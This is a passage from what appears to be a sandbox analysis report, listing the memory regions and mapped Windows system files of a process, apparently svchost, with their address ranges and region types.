region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 831 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 832 start_va = 0xb60000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 833 start_va = 0xb70000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 834 start_va = 0xbb0000 end_va = 0xbb7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 835 start_va = 0xbc0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 836 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 837 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 838 start_va = 0xbf0000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 839 start_va = 0xc10000 end_va = 0xc12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 840 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 841 start_va = 0xc30000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 842 start_va = 0xc40000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 843 start_va = 0xc80000 end_va = 0xc8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 844 start_va = 0xcb0000 end_va = 0xcbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 845 start_va = 0xcc0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 846 start_va = 0xcd0000 end_va = 0xdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 847 start_va = 0xdd0000 end_va = 0xddffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 848 start_va = 0xde0000 end_va = 0xde7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 849 start_va = 0xdf0000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 850 start_va = 0xe30000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 851 start_va = 0xe40000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 852 start_va = 0xe50000 end_va = 0xe57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 853 start_va = 0xe60000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 854 start_va = 0xea0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 855 start_va = 0xee0000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 856 start_va = 0xf00000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 857 start_va = 0xf70000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 858 start_va = 0xfe0000 end_va = 0xfe7fff monitored = 0 entry_point = 0xfe2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 859 start_va = 0x1000000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 860 start_va = 0x1040000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 861 start_va = 0x1050000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 862 start_va = 0x1090000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 863 start_va = 0x10e0000 end_va = 0x1145fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 864 start_va = 0x1170000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 865 start_va = 0x11e0000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 866 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 867 start_va = 0x12d0000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 868 start_va = 0x1330000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 869 start_va = 0x1370000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 870 start_va = 0x1490000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 871 start_va = 0x14e0000 end_va = 0x151ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 872 start_va = 0x1520000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 873 start_va = 0x1570000 end_va = 0x15affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 874 start_va = 0x1610000 end_va = 0x164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 875 start_va = 0x1690000 end_va = 0x16cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 876 start_va = 0x16f0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 877 start_va = 0x1730000 end_va = 0x176ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 878 start_va = 0x17c0000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 879 start_va = 0x1800000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 880 start_va = 0x1850000 end_va = 0x188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 881 start_va = 0x18a0000 end_va = 0x18dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 882 start_va = 0x1980000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 883 start_va = 0x1a00000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 884 start_va = 0x1a80000 end_va = 0x1a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 885 start_va = 0x1ad0000 end_va = 0x1b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ad0000" filename = "" Region: id = 886 start_va = 0x1b20000 end_va = 0x1b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 887 start_va = 0x1bb0000 end_va = 0x1beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 888 start_va = 0x1c50000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 889 start_va = 0x1c70000 end_va = 0x1caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 890 start_va = 0x1cb0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 891 start_va = 0x1db0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 892 start_va = 0x1fb0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 893 start_va = 0x20a0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 894 start_va = 0x20e0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 895 start_va = 0x2120000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 896 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 897 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 898 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 899 start_va = 0x2160000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002160000" filename = "" Region: id = 900 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 901 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 902 start_va = 0x22b0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 903 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 904 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002580000" filename = "" Region: id = 905 start_va = 0x2590000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 906 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 907 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 908 start_va = 0x25c0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025c0000" filename = "" Region: id = 909 start_va = 0x25d0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 910 start_va = 0x25e0000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 911 start_va = 0x2660000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 912 start_va = 0x26a0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 913 start_va = 0x26e0000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 914 start_va = 0x2b20000 end_va = 0x2c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 915 start_va = 0x2c80000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 916 start_va = 0x2cd0000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 917 start_va = 0x2d10000 end_va = 0x2dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 918 start_va = 0x2dd0000 end_va = 0x2e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 919 start_va = 0x2e90000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 920 start_va = 0x2ea0000 end_va = 0x2f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 921 start_va = 0x2fa0000 end_va = 0x309ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 922 start_va = 0x30a0000 end_va = 0x319ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 923 start_va = 0x31a0000 end_va = 0x329ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 924 start_va = 0x32a0000 end_va = 0x339ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 925 start_va = 0x33a0000 end_va = 0x349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 926 start_va = 0x34a0000 end_va = 0x449ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 927 start_va = 0x44a0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044a0000" filename = "" Region: id = 928 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 929 start_va = 0x4540000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 930 start_va = 0x4580000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 931 start_va = 0x45e0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 932 start_va = 0x4620000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 933 start_va = 0x4960000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 934 start_va = 0x4ac0000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 935 start_va = 0x4b00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 936 start_va = 0x50d0000 end_va = 0x510ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 937 start_va = 0x6a520000 end_va = 0x6a652fff monitored = 0 entry_point = 0x6a52145e region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 938 start_va = 0x6a930000 end_va = 0x6ab05fff monitored = 0 entry_point = 0x6a933e83 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 939 start_va = 0x6b120000 end_va = 0x6b12bfff monitored = 0 entry_point = 0x6b121160 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 940 start_va = 0x6b350000 end_va = 0x6b385fff monitored = 0 entry_point = 0x6b3515fa region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 941 start_va = 0x6bca0000 end_va = 0x6bca7fff monitored = 0 entry_point = 0x6bca31ff region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 942 start_va = 0x6bcc0000 end_va = 0x6bd51fff monitored = 0 entry_point = 0x6bcc1696 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 943 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 944 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 945 start_va = 0x6e7e0000 end_va = 0x6e7e7fff monitored = 0 entry_point = 0x6e7e21fa region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 946 start_va = 0x6eb00000 end_va = 0x6eb59fff monitored = 0 entry_point = 0x6eb01f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 947 start_va = 0x6fbc0000 end_va = 0x6fd62fff monitored = 0 entry_point = 0x6fbde815 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 948 start_va = 0x702f0000 end_va = 0x70304fff monitored = 0 entry_point = 0x702f12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 949 start_va = 0x70310000 end_va = 0x70361fff monitored = 0 entry_point = 0x703114be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 950 start_va = 0x70370000 end_va = 0x703d0fff monitored = 0 entry_point = 0x70373921 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 951 start_va = 0x706a0000 end_va = 0x706edfff monitored = 0 entry_point = 0x706d816e region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 952 start_va = 0x70930000 end_va = 0x7093efff monitored = 0 entry_point = 0x70938816 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 953 start_va = 0x70980000 end_va = 0x70991fff monitored = 0 entry_point = 0x70988f80 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 954 start_va = 0x70a00000 end_va = 0x70a2ffff monitored = 0 entry_point = 0x70a0803f region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 955 start_va = 0x70ab0000 end_va = 0x70afcfff monitored = 0 entry_point = 0x70ab864b region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 956 start_va = 0x71c60000 end_va = 0x71caefff monitored = 0 entry_point = 0x71c61452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 957 start_va = 0x71cb0000 end_va = 0x71d07fff monitored = 0 entry_point = 0x71cb13b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 958 start_va = 0x71d10000 end_va = 0x71d24fff monitored = 0 entry_point = 0x71d111fa region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 959 start_va = 0x71ff0000 end_va = 0x71ff8fff monitored = 0 entry_point = 0x71ff1830 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 960 start_va = 0x72000000 end_va = 0x720b9fff monitored = 0 entry_point = 0x720153ca region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 961 start_va = 0x724b0000 end_va = 0x724bafff monitored = 0 entry_point = 0x724b64d4 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 962 start_va = 0x724c0000 end_va = 0x724c7fff monitored = 0 entry_point = 0x724c3128 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 963 start_va = 0x724d0000 end_va = 0x724d6fff monitored = 0 entry_point = 0x724d1140 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 964 start_va = 0x724e0000 end_va = 0x72522fff monitored = 0 entry_point = 0x724e9dea region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 965 start_va = 0x72530000 end_va = 0x72581fff monitored = 0 entry_point = 0x725315e4 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 966 start_va = 0x72590000 end_va = 0x725a1fff monitored = 0 entry_point = 0x72593271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 967 start_va = 0x725b0000 end_va = 0x725bcfff monitored = 0 entry_point = 0x725b2012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 968 start_va = 0x725f0000 end_va = 0x72606fff monitored = 0 entry_point = 0x725fd006 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 969 start_va = 0x72630000 end_va = 0x7263cfff monitored = 0 entry_point = 0x72635f08 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 970 start_va = 0x72690000 end_va = 0x726c7fff monitored = 0 entry_point = 0x7269990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 971 start_va = 0x727c0000 end_va = 0x727c6fff monitored = 0 entry_point = 0x727c128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 972 start_va = 0x727d0000 end_va = 0x727ebfff monitored = 0 entry_point = 0x727da431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 973 start_va = 0x72800000 end_va = 0x72828fff monitored = 0 entry_point = 0x7280133a region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 974 start_va = 0x72e80000 end_va = 0x72ed0fff monitored = 0 entry_point = 0x72ea988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 975 start_va = 0x730d0000 end_va = 0x730e1fff monitored = 0 entry_point = 0x730d2d29 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 976 start_va = 0x73210000 end_va = 0x73217fff monitored = 0 entry_point = 0x73212ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 977 start_va = 0x73250000 end_va = 0x7325cfff monitored = 0 entry_point = 0x7325689d region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 978 start_va = 0x73440000 end_va = 0x7349afff monitored = 0 entry_point = 0x7347e260 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 979 start_va = 0x734a0000 end_va = 0x734aefff monitored = 0 entry_point = 0x734a7f10 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 980 start_va = 0x734b0000 end_va = 0x73540fff monitored = 0 entry_point = 0x73525520 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 981 start_va = 0x73550000 end_va = 0x73555fff monitored = 0 entry_point = 0x735514b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 982 start_va = 0x73560000 end_va = 0x735a6fff monitored = 0 entry_point = 0x73595440 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 983 start_va = 0x735b0000 end_va = 0x735c9fff monitored = 0 entry_point = 0x735c03d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 984 start_va = 0x735d0000 end_va = 0x73619fff monitored = 0 entry_point = 0x735d1851 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 985 start_va = 0x73620000 end_va = 0x7362efff monitored = 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 986 start_va = 0x73630000 end_va = 0x73679fff monitored = 0 entry_point = 0x73663960 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 987 start_va = 0x73680000 end_va = 0x73770fff monitored = 0 entry_point = 0x73734cc0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 988 start_va = 0x73780000 end_va = 0x73795fff monitored = 0 entry_point = 0x73791409 region_type = mapped_file name = "nci.dll" filename = 